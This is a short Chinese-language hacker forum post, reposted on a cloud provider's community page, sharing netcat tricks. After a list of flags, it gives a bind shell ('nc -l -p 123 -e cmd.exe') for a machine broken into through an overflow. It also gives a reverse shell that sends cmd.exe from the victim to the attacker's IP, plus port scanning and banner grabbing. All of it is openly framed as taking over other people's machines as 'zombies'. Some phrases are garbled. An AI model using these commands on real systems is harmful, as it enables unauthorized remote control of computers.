[駭客必看]我用NC的心得

來源:互聯網
上載者:User

參數解釋:
-e 程式重新導向
-t 用telnet來回應
-l 監聽本地連接埠
-p 指定本地連接埠
-v 獲得連接埠資訊
-vv 獲得詳細的連接埠資訊
-z 關閉輸入輸出
-n 指定IP地址
-w 設定逾時時間
-u UDP連接埠
我就知道這麼些參數 了:
第一個:
nc -l -v -p 7626
這就是開啟本地的7626連接埠進行監聽,並反饋串連資訊這樣如果有掃描冰河木馬的人會認為你中了木馬開放了7626,和“小豬快跑”的功能有點象,再加個批次檔一起用的話就是一個“小豬快跑”了.
如果要監視是否有入侵本地80連接埠的行為,並記下來,用這個命令:
nc -l -p 80 >>c://日誌.dat
這樣,凡是有針對本機80連接埠的攻擊都會被記錄下來的.
二、
如果你通過溢出進入了別人的機器,就可以運行:
nc -l -p 123 -e cmd.exe
或者是: nc -l -p 123 -t
作用都是以cmd.exe來響應到機器上123連接埠的串連.
這樣就把溢出的主機變成了一台telnet肉雞了!
你也可一用命令讓肉雞主動串連你的主機,假設我的IP是192.168.0.1 .
在肉雞上運行: nc -e cmd.exe 192.168.0.1 777
再在本地機器上運行: nc -l -p 777
意思是讓肉雞將cmd.exe(就是個shell)主動響應到你電腦的777連接埠。
你再在本地機上監聽777連接埠,這樣就進入了對方的cmd了。
這也微十時毫 反彈連接埠式木馬的原理了。
三、
用這個命令:
nc -v 192.168.0.25 80
就獲得了192.168.0.25的80連接埠的資訊。
可以獲得IIS版本等很多重要訊息 的 。
四、
你也可以將NC作為掃描器使用:
nc -v -z 192.168.0.25 1-100
掃描192.168.0.25的1到100間的TCP連接埠
用nc -v -z -u 192.168.0.25 1-100
這是掃描1到00間的UDP連接埠。
這些就是我這幾天悟出來的。
大家還有心得什麼沒有啊!

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.